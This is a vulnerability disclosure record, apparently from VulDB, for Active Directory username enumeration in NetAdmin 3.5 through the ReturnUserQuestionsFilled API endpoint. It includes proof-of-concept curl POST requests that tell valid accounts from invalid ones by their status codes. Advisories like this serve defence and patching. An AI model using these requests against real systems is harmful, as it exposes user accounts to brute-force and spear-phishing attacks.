| Title | NetAdmin Software NetAdmin 3.5 Username Enumeration |
|---|
| Description | Description: A user enumeration vulnerability was identified in the NetAdmin application by NetAdmin Software. The vulnerability exists in the /controller/api/Answer/ReturnUserQuestionsFilled endpoint, which allows for Active Directory user enumeration without proper protection. An attacker can send HTTP POST requests to this endpoint with a username in the request body. When a valid username is provided, the application responds with a 200 status code and the message {"data":[{"Message":"No questions have been answered yet","Status":"0"}]. However, when an invalid username is submitted, the application returns a 500 error with the message {"Message":"An error has occurred."}. This allows an attacker to efficiently determine the existence of Active Directory users.
The lack of protective mechanisms such as CAPTCHA or rate limiting makes this vulnerability exploitable through automation, facilitating brute-force attacks and increasing the risk of more serious system compromise.
Impact: This vulnerability allows unrestricted enumeration of Active Directory users, which can be exploited by attackers to obtain a valid list of user accounts. This type of attack may serve as the starting point for more harmful actions, such as brute-force or targeted spear-phishing attacks.
Affected Path:
Vulnerable route: /controller/api/Answer/ReturnUserQuestionsFilled
Request for Existing User:
curl -i 'https://netadminportal.site.com.br/controller/api/Answer/ReturnUserQuestionsFilled' \
-X POST \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Content-Type: application/json;charset=utf-8' \
--data-raw '{"username":"domain.com.br\\teste"}'
Response:
{
"data": [
{
"Message": "No questions have been answered yet",
"Status": "0"
}
]
}
Request for Non-Existent User:
curl -i 'https://netadminportal.site.com.br/controller/api/Answer/ReturnUserQuestionsFilled' \
-X POST \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Content-Type: application/json;charset=utf-8' \
--data-raw '{"username":"domain.com.br\\invalidUser"}'
Response:
{
"Message": "An error has occurred."
}
Vulnerability Classification:
CWE-203: Information Exposure Through Discrepancy
CWE-204: Sensitive Information Exposure Through HTTP Status Code
CWE-200: Exposure of Sensitive Information |
|---|
| Source | ⚠️ https://netadmin.software/gestao-de-identidade-e-acesso/ |
|---|
| User | tristao (UID 75382) |
|---|
| Submission | 09/25/2024 16:49 (2 years ago) |
|---|
| Moderation | 10/04/2024 08:40 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 279212 [Netadmin Software NetAdmin IAM up to 3.5 HTTP POST Request ReturnUserQuestionsFilled Username information exposure] |
|---|
| Points | 20 |
|---|